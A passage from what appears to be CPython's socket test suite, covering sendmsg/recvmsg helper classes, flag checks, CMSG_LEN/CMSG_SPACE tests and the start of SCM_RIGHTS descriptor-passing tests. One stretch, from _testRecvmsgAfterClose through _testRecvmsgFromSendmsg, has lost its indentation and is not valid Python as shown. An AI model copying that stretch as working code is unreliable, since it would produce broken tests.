# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
    """Base class for sendmsg()/recvmsg() tests.

    Subclasses supply cli_sock/serv_sock (plus cli_addr/serv_addr) and
    may override the hooks below to adapt sending, receiving and
    msg_flags checks to a particular socket type.
    """

    # Time in seconds to wait before considering a test failed, or
    # None for no timeout.  Not all tests actually set a timeout.
    fail_timeout = 3.0

    def setUp(self):
        # Event used by some subclasses to coordinate the two threads.
        self.misc_event = threading.Event()
        super().setUp()

    def sendToServer(self, msg):
        # Send msg to the server.
        return self.cli_sock.send(msg)

    # Tuple of alternative default arguments for sendmsg() when called
    # via sendmsgToServer() (e.g. to include a destination address).
    sendmsg_to_server_defaults = ()

    def sendmsgToServer(self, *args):
        # Call sendmsg() on self.cli_sock with the given arguments,
        # filling in any arguments which are not supplied with the
        # corresponding items of self.sendmsg_to_server_defaults, if
        # any.
        return self.cli_sock.sendmsg(
            *(args + self.sendmsg_to_server_defaults[len(args):]))

    def doRecvmsg(self, sock, bufsize, *args):
        # Call recvmsg() on sock with given arguments and return its
        # result.  Should be used for tests which can use either
        # recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
        # this method with one which emulates it using recvmsg_into(),
        # thus allowing the same test to be used for both methods.
        result = sock.recvmsg(bufsize, *args)
        self.registerRecvmsgResult(result)
        return result

    def registerRecvmsgResult(self, result):
        # Called by doRecvmsg() with the return value of recvmsg() or
        # recvmsg_into().  Can be overridden to arrange cleanup based
        # on the returned ancillary data, for instance.
        pass

    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer.
        self.assertEqual(addr1, addr2)

    # Flags that are normally unset in msg_flags
    msg_flags_common_unset = 0
    for name in ("MSG_CTRUNC", "MSG_OOB"):
        msg_flags_common_unset |= getattr(socket, name, 0)

    # Flags that are normally set
    msg_flags_common_set = 0

    # Flags set when a complete record has been received (e.g. MSG_EOR
    # for SCTP)
    msg_flags_eor_indicator = 0

    # Flags set when a complete record has not been received
    # (e.g. MSG_TRUNC for datagram sockets)
    msg_flags_non_eor_indicator = 0

    def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
        # Method to check the value of msg_flags returned by recvmsg[_into]().
        #
        # Checks that all bits in msg_flags_common_set attribute are
        # set in "flags" and all bits in msg_flags_common_unset are
        # unset.
        #
        # The "eor" argument specifies whether the flags should
        # indicate that a full record (or datagram) has been received.
        # If "eor" is None, no checks are done; otherwise, checks
        # that:
        #
        #  * if "eor" is true, all bits in msg_flags_eor_indicator are
        #    set and all bits in msg_flags_non_eor_indicator are unset
        #
        #  * if "eor" is false, all bits in msg_flags_non_eor_indicator
        #    are set and all bits in msg_flags_eor_indicator are unset
        #
        # If "checkset" and/or "checkunset" are supplied, they require
        # the given bits to be set or unset respectively, overriding
        # what the attributes require for those bits.
        #
        # If any bits are set in "ignore", they will not be checked,
        # regardless of the other inputs.
        #
        # Will raise Exception if the inputs require a bit to be both
        # set and unset, and it is not ignored.

        defaultset = self.msg_flags_common_set
        defaultunset = self.msg_flags_common_unset

        if eor:
            defaultset |= self.msg_flags_eor_indicator
            defaultunset |= self.msg_flags_non_eor_indicator
        elif eor is not None:
            defaultset |= self.msg_flags_non_eor_indicator
            defaultunset |= self.msg_flags_eor_indicator

        # Function arguments override defaults
        defaultset &= ~checkunset
        defaultunset &= ~checkset

        # Merge arguments with remaining defaults, and check for conflicts
        checkset |= defaultset
        checkunset |= defaultunset
        inboth = checkset & checkunset & ~ignore
        if inboth:
            raise Exception("contradictory set, unset requirements for flags "
                            "{0:#x}".format(inboth))

        # Compare with given msg_flags value
        mask = (checkset | checkunset) & ~ignore
        self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
    # Mixin to implement doRecvmsg() using recvmsg_into().

    def doRecvmsg(self, sock, bufsize, *args):
        # Emulate recvmsg() with one bufsize-byte buffer, then reshape
        # the result into recvmsg()'s (data, ancdata, flags, addr) form.
        buf = bytearray(bufsize)
        result = sock.recvmsg_into([buf], *args)
        self.registerRecvmsgResult(result)
        # Sanity-check the reported byte count before slicing with it.
        self.assertGreaterEqual(result[0], 0)
        self.assertLessEqual(result[0], bufsize)
        return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
    # Datagram sockets report a short read via MSG_TRUNC, so fold it
    # into the inherited set of non-EOR indicator flags.
    @property
    def msg_flags_non_eor_indicator(self):
        inherited = super().msg_flags_non_eor_indicator
        return inherited | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
    # SCTP sockets mark a complete record with MSG_EOR, so fold it
    # into the inherited set of EOR indicator flags.
    @property
    def msg_flags_eor_indicator(self):
        inherited = super().msg_flags_eor_indicator
        return inherited | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
    # Base class for tests on connectionless-mode sockets.  Users must
    # supply sockets on attributes cli and serv to be mapped to
    # cli_sock and serv_sock respectively.

    @property
    def serv_sock(self):
        return self.serv

    @property
    def cli_sock(self):
        return self.cli

    @property
    def sendmsg_to_server_defaults(self):
        # Unconnected sends need an explicit destination address.
        return ([], [], 0, self.serv_addr)

    def sendToServer(self, msg):
        return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
    # Base class for tests on connected sockets.  Users must supply
    # sockets on attributes serv_conn and cli_conn (representing the
    # connections *to* the server and the client), to be mapped to
    # cli_sock and serv_sock respectively.

    @property
    def serv_sock(self):
        return self.cli_conn

    @property
    def cli_sock(self):
        return self.serv_conn

    def checkRecvmsgAddress(self, addr1, addr2):
        # Address is currently "unspecified" for a connected socket,
        # so we don't examine it
        pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
    # Base class to set a timeout on server's socket.

    def setUp(self):
        super().setUp()
        # Bound every blocking server-side call so a hung test times
        # out instead of deadlocking the suite.
        self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
    # Tests for sendmsg() which can use any socket type and do not
    # involve recvmsg() or recvmsg_into().  Each testFoo() runs on the
    # server side while its _testFoo() twin runs in the client thread.

    def testSendmsg(self):
        # Send a simple message with sendmsg().
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsg(self):
        self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))

    def testSendmsgDataGenerator(self):
        # Send from buffer obtained from a generator (not a sequence).
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgDataGenerator(self):
        self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
                         len(MSG))

    def testSendmsgAncillaryGenerator(self):
        # Gather (empty) ancillary data from a generator.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgAncillaryGenerator(self):
        self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
                         len(MSG))

    def testSendmsgArray(self):
        # Send data from an array instead of the usual bytes object.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgArray(self):
        self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
                         len(MSG))

    def testSendmsgGather(self):
        # Send message data from more than one buffer (gather write).
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgGather(self):
        self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))

    def testSendmsgBadArgs(self):
        # Check that sendmsg() rejects invalid arguments.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgBadArgs(self):
        # Every call must raise TypeError without sending; the final
        # b"done" proves nothing leaked through to the server.
        self.assertRaises(TypeError, self.cli_sock.sendmsg)
        self.assertRaises(TypeError, self.sendmsgToServer,
                          b"not in an iterable")
        self.assertRaises(TypeError, self.sendmsgToServer,
                          object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG, object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [], object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [], 0, object())
        self.sendToServer(b"done")

    def testSendmsgBadCmsg(self):
        # Check that invalid ancillary data items are rejected.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgBadCmsg(self):
        # Ancillary items must be (level, type, data) triples with the
        # right member types; anything else raises TypeError.
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(object(), 0, b"data")])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, object(), b"data")])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, object())])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0)])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, b"data", 42)])
        self.sendToServer(b"done")

    @requireAttrs(socket, "CMSG_SPACE")
    def testSendmsgBadMultiCmsg(self):
        # Check that invalid ancillary data items are rejected when
        # more than one item is present.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    @testSendmsgBadMultiCmsg.client_skip
    def _testSendmsgBadMultiCmsg(self):
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [0, 0, b""])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, b""), object()])
        self.sendToServer(b"done")

    def testSendmsgExcessCmsgReject(self):
        # Check that sendmsg() rejects excess ancillary data items
        # when the number that can be sent is limited.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgExcessCmsgReject(self):
        if not hasattr(socket, "CMSG_SPACE"):
            # Can only send one item
            with self.assertRaises(OSError) as cm:
                self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
            self.assertIsNone(cm.exception.errno)
        self.sendToServer(b"done")

    def testSendmsgAfterClose(self):
        # Check that sendmsg() fails on a closed socket.
        pass

    def _testSendmsgAfterClose(self):
        self.cli_sock.close()
        self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
    # Tests for sendmsg() which require a stream socket and do not
    # involve recvmsg() or recvmsg_into().

    def testSendmsgExplicitNoneAddr(self):
        # Check that peer address can be specified as None.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgExplicitNoneAddr(self):
        self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))

    def testSendmsgTimeout(self):
        # Check that timeout works with sendmsg().
        self.assertEqual(self.serv_sock.recv(512), b"a"*512)
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    def _testSendmsgTimeout(self):
        try:
            self.cli_sock.settimeout(0.03)
            try:
                # Keep sending until the short timeout trips.
                while True:
                    self.sendmsgToServer([b"a"*512])
            except socket.timeout:
                pass
            except OSError as exc:
                if exc.errno != errno.ENOMEM:
                    raise
                # bpo-33937 the test randomly fails on Travis CI with
                # "OSError: [Errno 12] Cannot allocate memory"
            else:
                self.fail("socket.timeout not raised")
        finally:
            # Unblock the server side regardless of the outcome.
            self.misc_event.set()

    # XXX: would be nice to have more tests for sendmsg flags argument.

    # Linux supports MSG_DONTWAIT when sending, but in general, it
    # only works when receiving.  Could add other platforms if they
    # support it too.
    @skipWithClientIf(sys.platform not in {"linux"},
                      "MSG_DONTWAIT not known to work on this platform when "
                      "sending")
    def testSendmsgDontWait(self):
        # Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
        self.assertEqual(self.serv_sock.recv(512), b"a"*512)
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    @testSendmsgDontWait.client_skip
    def _testSendmsgDontWait(self):
        try:
            with self.assertRaises(OSError) as cm:
                while True:
                    self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
            # bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
            # with "OSError: [Errno 12] Cannot allocate memory"
            self.assertIn(cm.exception.errno,
                          (errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
        finally:
            self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
    # Tests for sendmsg() which require a connectionless-mode
    # (e.g. datagram) socket, and do not involve recvmsg() or
    # recvmsg_into().

    def testSendmsgNoDestAddr(self):
        # Check that sendmsg() fails when no destination address is
        # given for unconnected socket.
        pass

    def _testSendmsgNoDestAddr(self):
        # Call cli_sock.sendmsg() directly so sendmsg_to_server_defaults
        # cannot fill in an address for us.
        self.assertRaises(OSError, self.cli_sock.sendmsg,
                          [MSG])
        self.assertRaises(OSError, self.cli_sock.sendmsg,
                          [MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
    # Tests for recvmsg() which can also be emulated using
    # recvmsg_into(), and can use any socket type.  All receives go
    # through doRecvmsg() so RecvmsgIntoMixin can swap implementations.

    def testRecvmsg(self):
        # Receive a simple message with recvmsg[_into]().
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsg(self):
        self.sendToServer(MSG)

    def testRecvmsgExplicitDefaults(self):
        # Test recvmsg[_into]() with default arguments provided explicitly.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgExplicitDefaults(self):
        self.sendToServer(MSG)

    def testRecvmsgShorter(self):
        # Receive a message smaller than buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) + 42)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgShorter(self):
        self.sendToServer(MSG)

    def testRecvmsgTrunc(self):
        # Receive part of message, check for truncation indicators.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=False)

    def _testRecvmsgTrunc(self):
        self.sendToServer(MSG)

    def testRecvmsgShortAncillaryBuf(self):
        # Test ancillary data buffer too small to hold any ancillary data.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgShortAncillaryBuf(self):
        self.sendToServer(MSG)

    def testRecvmsgLongAncillaryBuf(self):
        # Test large ancillary data buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgLongAncillaryBuf(self):
        self.sendToServer(MSG)

    def testRecvmsgAfterClose(self):
        # Check that recvmsg[_into]() fails on a closed socket.
        self.serv_sock.close()
        self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
    """Tests which require a stream socket; usable with either
    recvmsg() or recvmsg_into()."""

    def testRecvmsgEOF(self):
        # Peer closed its end: expect the empty-bytes EOF indicator.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
        self.assertEqual(msg, b"")
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        # Whether an end-of-record marker appears at EOF is
        # implementation-defined, so don't check the flag either way.
        self.checkFlags(flags, eor=None)

    def _testRecvmsgEOF(self):
        self.cli_sock.close()

    def testRecvmsgOverflow(self):
        # A single sent message may be consumed in several chunks.
        first_part, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                          len(MSG) - 3)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=False)

        second_part, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                           1024)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

        # The two chunks together must reconstruct the original message.
        self.assertEqual(first_part + second_part, MSG)

    def _testRecvmsgOverflow(self):
        self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
    """Tests specific to recvmsg(); any socket type."""

    def testRecvmsgBadArgs(self):
        # recvmsg() must reject missing or badly-typed arguments...
        self.assertRaises(TypeError, self.serv_sock.recvmsg)
        bad_calls = (
            (ValueError, (-1, 0, 0)),
            (ValueError, (len(MSG), -1, 0)),
            (TypeError, ([bytearray(10)], 0, 0)),
            (TypeError, (object(), 0, 0)),
            (TypeError, (len(MSG), object(), 0)),
            (TypeError, (len(MSG), 0, object())),
        )
        for exc, call_args in bad_calls:
            self.assertRaises(exc, self.serv_sock.recvmsg, *call_args)

        # ...but a correct call must still work afterwards.
        msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgBadArgs(self):
        self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
    # Tests for recvmsg_into() which can use any socket type.

    def testRecvmsgIntoBadArgs(self):
        # Check that recvmsg_into() rejects invalid arguments.
        buf = bytearray(len(MSG))
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
        # A bare buffer size instead of a buffer list is rejected.
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          len(MSG), 0, 0)
        # A bare buffer (not wrapped in a list) is rejected.
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          buf, 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [object()], 0, 0)
        # Read-only buffers are rejected.
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [b"I'm not writable"], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf, object()], 0, 0)
        self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
                          [buf], -1, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf], object(), 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf], 0, object())

        # A correct call still succeeds after all the rejections.
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoBadArgs(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoGenerator(self):
        # Receive into buffer obtained from a generator (not a sequence).
        buf = bytearray(len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            (o for o in [buf]))
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoGenerator(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoArray(self):
        # Receive into an array rather than the usual bytearray.
        buf = array.array("B", [0] * len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf.tobytes(), MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoArray(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter write).
        b1 = bytearray(b"----")
        b2 = bytearray(b"0123456789")
        b3 = bytearray(b"--------------")
        # The memoryview slice exposes only bytes 2..8 of b2, so the
        # incoming data is scattered across b1, the middle of b2, and b3.
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            [b1, memoryview(b2)[2:9], b3])
        self.assertEqual(nbytes, len(b"Mary had a little lamb"))
        self.assertEqual(b1, bytearray(b"Mary"))
        self.assertEqual(b2, bytearray(b"01 had a 9"))
        self.assertEqual(b3, bytearray(b"little lamb---"))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoScatter(self):
        self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
    """Checks for CMSG_LEN() and CMSG_SPACE(), which share code with
    sendmsg() and recvmsg[_into]()."""

    # Mirror the socklen_t limit defined in socketmodule.c.
    try:
        import _testcapi
    except ImportError:
        socklen_t_limit = 0x7fffffff
    else:
        socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)

    @requireAttrs(socket, "CMSG_LEN")
    def testCMSG_LEN(self):
        # Exercise CMSG_LEN() over small sizes and sizes just below
        # the largest accepted value.
        over_limit = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
        probe_values = list(range(257)) + list(range(over_limit - 257,
                                                     over_limit))

        # struct cmsghdr has at least three members, two of which are ints.
        self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)

        for datalen in probe_values:
            result = socket.CMSG_LEN(datalen)
            # recvmsg() recovers the data size exactly this way.
            self.assertEqual(result - socket.CMSG_LEN(0), datalen)
            self.assertLessEqual(result, self.socklen_t_limit)

        self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
        # sendmsg() shares this code and must reject over-limit values.
        self.assertRaises(OverflowError, socket.CMSG_LEN, over_limit)
        self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)

    @requireAttrs(socket, "CMSG_SPACE")
    def testCMSG_SPACE(self):
        # Exercise CMSG_SPACE() over the same spread of sizes,
        # checking the assumptions used by sendmsg().
        over_limit = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
        probe_values = list(range(257)) + list(range(over_limit - 257,
                                                     over_limit))
        prev = socket.CMSG_SPACE(0)

        # struct cmsghdr has at least three members, two of which are ints.
        self.assertGreater(prev, array.array("i").itemsize * 2)

        for datalen in probe_values:
            result = socket.CMSG_SPACE(datalen)
            # CMSG_SPACE() must be monotonic and never smaller than
            # the corresponding CMSG_LEN() values.
            self.assertGreaterEqual(result, prev)
            self.assertGreaterEqual(result, socket.CMSG_LEN(datalen))
            self.assertGreaterEqual(result, datalen + socket.CMSG_LEN(0))
            self.assertLessEqual(result, self.socklen_t_limit)
            prev = result

        self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
        # sendmsg() shares this code and must reject over-limit values.
        self.assertRaises(OverflowError, socket.CMSG_SPACE, over_limit)
        self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
    # Tests for file descriptor passing on Unix-domain sockets.

    # Invalid file descriptor value that's unlikely to evaluate to a
    # real FD even if one of its bytes is replaced with a different
    # value (which shouldn't actually happen).
    badfd = -0x5555

    def newFDs(self, n):
        # Return a list of n file descriptors for newly-created files
        # containing their list indices as ASCII numbers.
        fds = []
        for i in range(n):
            fd, path = tempfile.mkstemp()
            self.addCleanup(os.unlink, path)
            self.addCleanup(os.close, fd)
            os.write(fd, str(i).encode())
            fds.append(fd)
        return fds

    def checkFDs(self, fds):
        # Check that the file descriptors in the given list contain
        # their correct list indices as ASCII numbers.
        for n, fd in enumerate(fds):
            os.lseek(fd, 0, os.SEEK_SET)
            self.assertEqual(os.read(fd, 1024), str(n).encode())

    def registerRecvmsgResult(self, result):
        # Ensure any FDs carried in result's ancillary data get closed
        # at teardown.
        self.addCleanup(self.closeRecvmsgFDs, result)

    def closeRecvmsgFDs(self, recvmsg_result):
        # Close all file descriptors specified in the ancillary data
        # of the given return value from recvmsg() or recvmsg_into().
        for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                fds = array.array("i")
                # Only decode whole ints; drop any trailing partial one.
                fds.frombytes(cmsg_data[:
                        len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
                for fd in fds:
                    os.close(fd)

    def createAndSendFDs(self, n):
        # Send n new file descriptors created by newFDs() to the
        # server, with the constant MSG as the non-ancillary data.
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.SOL_SOCKET,
                                   socket.SCM_RIGHTS,
                                   array.array("i", self.newFDs(n)))]),
            len(MSG))

    def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
        # Check that constant MSG was received with numfds file
        # descriptors in a maximum of maxcmsgs control messages (which
        # must contain only complete integers).  By default, check
        # that MSG_CTRUNC is unset, but ignore any flags in
        # ignoreflags.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertIsInstance(ancdata, list)
        self.assertLessEqual(len(ancdata), maxcmsgs)
        fds = array.array("i")
        for item in ancdata:
            self.assertIsInstance(item, tuple)
            cmsg_level, cmsg_type, cmsg_data = item
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            self.assertIsInstance(cmsg_data, bytes)
            # Each control message must carry a whole number of ints.
            self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
            fds.frombytes(cmsg_data)

        self.assertEqual(len(fds), numfds)
        self.checkFDs(fds)

    def testFDPassSimple(self):
        # Pass a single FD (array read from bytes object).
        self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testFDPassSimple(self):
        self.assertEqual(
            self.sendmsgToServer(
                [MSG],
                [(socket.SOL_SOCKET,
                  socket.SCM_RIGHTS,
                  array.array("i", self.newFDs(1)).tobytes())]),
            len(MSG))

    def testMultipleFDPass(self):
        # Pass multiple FDs in a single array.
        self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testMultipleFDPass(self):
        self.createAndSendFDs(4)

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassCMSG_SPACE(self):
        # Test using CMSG_SPACE() to calculate ancillary buffer size.
